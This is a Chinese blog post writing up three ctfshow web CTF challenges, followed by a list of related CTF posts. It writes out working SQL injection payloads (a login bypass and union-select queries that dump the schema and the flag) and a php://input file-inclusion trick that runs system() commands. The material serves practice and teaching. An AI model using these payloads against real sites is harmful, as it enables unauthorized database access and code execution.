刷web记录之ctfshow

最新推荐文章于 2024-05-16 10:34:55 发布
最新推荐文章于 2024-05-16 10:34:55 发布
阅读量226 收藏
点赞数
分类专栏: ctfshow web 部分wp 文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dwrnxjlove/article/details/118609610
版权

记录ctfshow web 练习题

目录

web签到题1

打开之后有一段话“where is flag? ”其他什么也没有,查看一下网络源代码发现里面有一段注释掉的beas64
在这里插入图片描述
将其进行解码就能得到flag
在这里插入图片描述

web2

打开之后是一个非常简陋的登录框根据题目所说这应该是一道sql注入题
在这里插入图片描述首先进行简单的测试:

万能登录:admin' or 1=1#
密码:随意,只要有即可

在这里插入图片描述
在这里插入图片描述
登录之后,就可以开始尝试注入了,这道题可以看出来显示位是3,因此直接进行sql注入

admin' union select 1,database(),3#

在这里插入图片描述
得到其数据库为web2

admin'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#

在这里插入图片描述可以得到其表名:flag,user

admin'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#

在这里插入图片描述得到其字段名为flag

admin'union select 1,flag,3 from flag#

在这里插入图片描述即可得到flag,这题很简单,是很基础的sql注入

web3

打开之后是一个很简洁的页面,提示有incldde构成的文件包含的漏洞,查看网页源代码并没有发现什么价值的东西。因为有文件包含漏洞,我们可以尝试使用伪协议:php://input给其构成命令执行漏洞

php://input

在这里插入图片描述然后对所构造的页面进行抓包

在这里插入图片描述然后在构造命令:

<?php system("ls");?>

在这里插入图片描述然后在构造命令查看ctf_go_go_go文件:

<?php system("cat ctf_go_go_go");?>

得到结果:
在这里插入图片描述

伟已茹心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow 做题 web 方向 web1~web10
Goodric的博客
05-29 1792
ctfshow 做题 web 方向 —— web1 签到题 打开环境,页面中就一句话:where is flag ? F12 查看源代码,注释中一串字符,猜测为 base64 编码。 base64 解码得 flag 。 —— —— web2 题目描述:最简单的 sql 注入。 打开环境是一个登录界面。 注入点应该就是用户名、密码的位置了。 用户名和密码的提交方式为 post ,用 burp抓包,复制数据包到新建 txt 文件。然后用 sqlmap 直接爆数据。 爆数据库: python2 sqlm
ctfshow-WEB-web1签到题
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
ctfshow-WEB-web1签到题_ctf web where is flag(1)
最新发布
2401_84297899的博客
05-16 383
页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag复制注释符中间的内容,到解密将解密后的内容整个复制到flag的输入框里提交,即可过关还有兄弟不知道网络安全面试可以提前题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
Bugku CTF 每日一题 where is flag
彼岸花苏陌的博客
01-28 2898
where is flag 番外篇 解压得到两个压缩包 第一个压缩包key可以解压 第二个压缩包出师表要密码才能解压 打开第一个压缩包解压发现出师表中有些残缺,比如 先帝创业未办AAAAA 而且下一段也接不上 而且有些有aaa啥的有些又没有,于是想到是不是凑字数?于是看了一下长度在这里发现了异常(用360解压不行,用的winrar) 前面的减去后面的 353-278=75 284-183=101 315-194=121 238-180=58 331-241=90 351-247=104 316-199=
CTFshowWEB3(1),网络安全工作经验6年
m0_61331407的博客
04-07 279
利用此协议需要为on,可以访问请求的原始数据的只读流,将。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。
ctf.show web入门
nidaxin的博客
01-21 5277
信息收集 web1:【where is flag】 打开开发者工具 web2:【无法查看源代码】 ctrl+u或者开发者工具·都可以 web3:【where is flag】 直接抓包,查看响应包 web4:【robots】 Robots协议:也称为爬虫协议、机器人协议等,其全称为“网络爬虫排除标准",它通常是一个叫做robots.txt的文本文件,一般放在网站的根目录下。网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 先抓包,发现响应包里面并没有f.
【青少年CTF】“Flag在哪里?”解题记录
qq_64868579的博客
06-04 1344
例如“Flag在哪里?青少年CTF训练平台:www.qsnctf.com。复制以后选择其中qsnctf{}部分提交即可。第一反应就是查看网页源代码寻找flag。描述中并没有给出什么有用的信息。博主用户名:Fourstar.一般来讲有关于直接问Flag的。开启Game-Box题目环境。但是右键或者选中都没有用。所以直接F12进入检查。
ctf.show 通关秘籍
qq_37970270的博客
09-13 1377
@ CTF.show 1.web签到题 访问web签到题的地址,发现页面只有"where is flag"字样 使用Fn+F12进入调试模式,或者页面空白处点击右键查看网页源代码,发现页面中有一段英文字符串被注释了,根据编码规则猜测使用的是base64的加密方式。 使用解码平台尝试解码,示例使用站长之家,成功获取到flag。(url:http://tool.chinaz.com/tools/base64.aspx) ...
Bugku CTF---where is flag
3tefanie丶zhou的博客
12-01 4733
【不是“我觉得”三个字,就可以弥补所有因为好心办坏事带来的后果】
CTFshow 1-10关
weixin_62369433的博客
11-11 2173
CTFshow 1-10 通关详解
Python图片转base64
XerCis的博客
09-09 1万+
base64 是一种用于传输 8Bit 字节码的编码方式,基于 64 个可打印字符来表示二进制数据
whereistheflag:WHAAAAAT ?????????????????????
02-10
旗帜在哪里 WHAAAAAT ???????????????????????? /
BugKu-MISC
龙卷风摧毁停车场
04-07 899
签到题 关注微信公众号,直接提供flag输入即可 社工-进阶收集 社会工程学就是搜集信息,通过图片可以得到这个是西安的大雁塔,所以去找一下西安的地铁线路图 大雁塔在四号线,距离大雁塔七站的始发站有二号线的韦曲南和三号线的鱼化寨,并且动态中提到,小妹需要进行中转,所以能够确定是在韦曲南始发,所以查看地图以韦曲南为中心查看方圆八百米的小区即可 将这些小区的名字拼音进行尝试,最后得到的是flag{lanqiaoguojicheng} 1和0的故事 下载得到txt,内容全是0和1组成的,确实很ga
Bugku CTF---where is flag 5
3tefanie丶zhou的博客
04-19 1808
【喜欢周周ovo】
whereisflag
weixin_52034946的博客
03-07 551
刚打开都是数字,一脸懵,试着换成char类型,然后大端序拼接得到flag CnHongKe{849bc02af213b4d}
ISCC2017 where is your flag
烟敛寒林的博客
04-25 712
猜测是sql注入的题,先测试一下 一开始测试id,结果发现消失,看来id是注入点 但之后无论怎么尝试都没见回显,一开始以为都被过滤,但后来经测试不是,猜测可能是'被转义了 果真报错了,直接利用报错注入即可 在这里需要分片一下 不过其实还有简单的,通过扫目录发现有个flag.php有句提示 这都已经说明了thisisflag是列名,flag是表名 反正得到flag f...
ISCC2017部分题目wp
xuqi7
05-26 1万+
比赛网址:http://iscc.isclab.org.cn 小菜做的一些题
CTF题解三 逆向 where is your flag(ISCC2017)
LJFYYJ的博客
07-11 2997
直接进入test函数: 下面的代码进行第一步操作: 首先a1的长度应该为19。 接下来对s2进行异或处理。 题目中给出的s2的值如下: s2 = 0x3929531D01070A00LL; v4 = 0x391257391F150703LL; v5 = 0x150F; v6 = 0x1B; s2是int64类型,共有8个字节。由于s2、v4、v5和v6的地址是相连的,所以当...
Bugku where is flag 番外篇 详解 MISC
fi0stBlooder的博客
07-10 4061
文章目录一、题目二、思路1、解压所有文件2、密码的获取三、复现1、获取密码2、解压:出师表.rar3、使用winhex或者notepad++查看。4、对获取到的数据进行解码。四、总结 我会不定时更新bugku的题目,和大家共同学习,披荆斩棘。日拱一卒,你的付出,终将使你强大。希望大家喜欢,多多点赞收藏谢谢。 一、题目 下载完成后为一个压缩包文件file.rar,将其解压后获得Key.rar和出师表.rar,解压Key.rar获得13个txt结尾的文档,里面为《出师表》,解压出师表.rar时有密码无法解
ctfshow WEB
09-20
ctf.show的WEB是一个CTF(Capture The Flag)赛事中的一个Web题目。根据提供的引用内容,可以看出这个题目涉及到了文件读取漏洞和命令注入漏洞。在第一个引用中,flag文件的路径被传递到了一个URL参数中,并且在源码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值